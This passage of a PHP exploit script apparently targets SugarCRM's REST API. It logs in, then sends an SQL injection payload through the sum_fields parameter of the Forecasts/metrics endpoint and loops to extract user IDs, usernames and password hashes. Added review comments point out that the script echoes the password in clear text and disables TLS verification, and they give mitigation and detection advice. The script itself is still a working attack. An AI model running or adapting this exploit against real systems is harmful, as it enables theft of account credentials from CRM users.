\n");
// NOTE(review): the line above is the tail of a statement that begins before
// this excerpt (presumably the usage message; the opening is not visible here).

// Target base URL and credentials are taken from the command line.
list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

// The supplied password is echoed in clear text, so it ends up in terminal
// scrollback and in any captured output of this script.
print "[-] Logging in with username '{$user}' and password '{$pass}'\n";

$ch = curl_init();

// OAuth2 password grant against the REST API, using the "sugar" client id.
// The script authenticates before anything else, so the request below is made
// with a valid session; the privilege level required is not shown here.
$login = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];

curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token");
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($login));
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Certificate verification is switched off: the credentials and the token
// travel over a TLS connection whose peer is not authenticated.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Stops when the token response carries no access_token.
if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[-] Login failed!\n");

print "[-] Executing SQL injection attack\n";

// The same curl handle is reused for the authenticated endpoint under test.
curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Forecasts/metrics");
curl_setopt($ch, CURLOPT_HTTPHEADER, ["OAuth-Token: {$token}", "Content-Type: application/json"]);

// Seed for the NOT IN (...) list: a single empty string literal.
$in = "''";

// Value sent as metrics[0].sum_fields. It closes a parenthesis, adds its own
// select expression and FROM/UNION clauses, and ends with '#', so the server
// presumably concatenates sum_fields into a SELECT without validation (the
// server code is not visible here; confirm against the vendor fix).
// Defender notes:
//  - Mitigation: accept only known field names of the requested module for
//    sum_fields (allowlist) and never place request data into SQL text.
//  - Detection: review POSTs to rest/v10/Forecasts/metrics whose sum_fields
//    contains anything other than a plain identifier (parentheses, quotes,
//    whitespace, SQL keywords, '#').
$sql = "1), CONCAT(id,'||',user_name,'||',user_hash) metric_count FROM users WHERE user_name NOT IN (%s) UNION SELECT 1,2,3 FROM purchased_line_items WHERE ((purchased_line_items.team_set_id IN (SELECT tst.team_set_id FROM team_sets_teams tst#";

// Request body; only metrics[0].sum_fields is filled in later, inside the loop.
$params = ["module" => "PurchasedLineItems", "filter" => [], "user_id" => "", "type" => "", "time_period" => "", "metrics" => [0 => ["filter" => []]]];

print "============================================================================\n";

// One request per iteration. Each returned user_name is appended to the
// NOT IN list, and the loop ends when the returned value no longer splits
// into three '||'-separated parts.
// The fields read are users.id, users.user_name and users.user_hash: the line
// labelled "Password" prints the stored hash, not a clear-text password.
// Where this request pattern appears in logs, treat the stored hashes as
// disclosed and rotate the affected credentials.
while(1) { $params["metrics"][0]["sum_fields"] = sprintf($sql, $in); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params)); if (($metrics = (json_decode(curl_exec($ch), true))["metrics"]) == null) die("[-] Attack failed!\n"); if (count($info = explode("||", $metrics[""]["values"]["count"])) != 3) break; $in .= ",'{$info[1]}'"; print "[-] User ID...: {$info[0]}\n"; print "[-] Username..: {$info[1]}\n"; print "[-] Password..: {$info[2]}\n"; print "============================================================================\n"; }